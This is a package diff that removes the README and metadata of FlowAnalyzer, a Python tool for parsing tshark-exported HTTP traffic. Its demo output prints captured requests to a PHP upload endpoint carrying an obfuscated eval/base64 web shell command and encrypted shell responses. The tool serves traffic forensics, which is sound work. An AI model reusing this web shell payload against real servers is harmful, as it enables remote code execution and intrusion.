- Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
- Home-page: https://github.com/Byxs20/FlowAnalyzer
6
- Author: Byxs20
7
- Author-email: 97766819@qq.com
8
- Classifier: Development Status :: 3 - Alpha
9
- Classifier: Intended Audience :: Developers
10
- Classifier: License :: OSI Approved :: MIT License
11
- Classifier: Programming Language :: Python :: 3
12
- Classifier: Programming Language :: Python :: 3.6
13
- Classifier: Programming Language :: Python :: 3.7
14
- Classifier: Programming Language :: Python :: 3.8
15
- Classifier: Programming Language :: Python :: 3.9
16
- Description-Content-Type: text/markdown
17
- License-File: LICENSE
18
-
19
- # FlowAnalyzer
20
-
21
- # 安装
22
-
23
- 使用 `pip` 安装:
24
-
25
- ```
26
- pip3 install FlowAnalyzer
27
- ```
28
-
29
- ```
30
- pip3 install FlowAnalyzer -i https://pypi.org/simple
31
- ```
32
-
33
- # 快速上手
34
-
35
- 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
36
-
37
- ```python
38
- # windows
39
- tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
40
- ```
41
-
42
- 您确定路径没有问题,那也无需任何配置即可使用!
43
-
44
- 否则,您需要修改 `python安装目录\Lib\site- packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为您的安装目录
45
-
46
- ```
47
- $ git clone https://github.com/Byxs20/FlowAnalyzer.git
48
- $ cd ./FlowAnalyzer/
49
- ```
50
-
51
- 使用 `python3 .\tests\demo.py` 看是否能输出正确的运行结果,测试代码如下:
52
-
53
- ```python
54
- # sourcery skip: use-fstring-for-formatting
55
- import os
56
- from FlowAnalyzer import FlowAnalyzer
57
-
58
-
59
- baseDir = os.path.dirname(os.path.abspath(__file__))
60
- flowPath = os.path.join(baseDir, "flow.pcapng")
61
- display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
62
-
63
- jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
64
- for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
65
- print(f"[+] 正在处理第{count}个HTTP流!")
66
-
67
- request, response = http.request, http.response
68
- if request:
69
- request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
70
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
71
-
72
- if response:
73
- response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
74
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
75
- ```
76
-
77
- 运行结果:
78
-
79
- ```
80
- [+] 正在处理第1个HTTP流!
81
- 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
82
- 序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
83
- [+] 正在处理第2个HTTP流!
84
- 序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
85
- 序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
86
- ...
87
- ```
88
-
89
- # Contributing
90
- Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
91
-
92
- # License
93
-
94
- This project is licensed under the [MIT License.](LICENSE)
flowanalyzer-0.3.6/README.md DELETED
@@ -1,76 +0,0 @@
1
- # FlowAnalyzer
2
-
3
- # 安装
4
-
5
- 使用 `pip` 安装:
6
-
7
- ```
8
- pip3 install FlowAnalyzer
9
- ```
10
-
11
- ```
12
- pip3 install FlowAnalyzer -i https://pypi.org/simple
13
- ```
14
-
15
- # 快速上手
16
-
17
- 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
18
-
19
- ```python
20
- # windows
21
- tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
22
- ```
23
-
24
- 您确定路径没有问题,那也无需任何配置即可使用!
25
-
26
- 否则,您需要修改 `python安装目录\Lib\site- packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为您的安装目录
27
-
28
- ```
29
- $ git clone https://github.com/Byxs20/FlowAnalyzer.git
30
- $ cd ./FlowAnalyzer/
31
- ```
32
-
33
- 使用 `python3 .\tests\demo.py` 看是否能输出正确的运行结果,测试代码如下:
34
-
35
- ```python
36
- # sourcery skip: use-fstring-for-formatting
37
- import os
38
- from FlowAnalyzer import FlowAnalyzer
39
-
40
-
41
- baseDir = os.path.dirname(os.path.abspath(__file__))
42
- flowPath = os.path.join(baseDir, "flow.pcapng")
43
- display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
44
-
45
- jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
46
- for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
47
- print(f"[+] 正在处理第{count}个HTTP流!")
48
-
49
- request, response = http.request, http.response
50
- if request:
51
- request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
52
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
53
-
54
- if response:
55
- response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
56
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
57
- ```
58
-
59
- 运行结果:
60
-
61
- ```
62
- [+] 正在处理第1个HTTP流!
63
- 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
64
- 序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
65
- [+] 正在处理第2个HTTP流!
66
- 序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
67
- 序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
68
- ...
69
- ```
70
-
71
- # Contributing
72
- Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
73
-
74
- # License
75
-
76
- This project is licensed under the [MIT License.](LICENSE)
{flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/LICENSE RENAMED
File without changes
{flowanalyzer-0.3.6 → FlowAnalyzer-0.3.8}/setup.cfg RENAMED
File without changes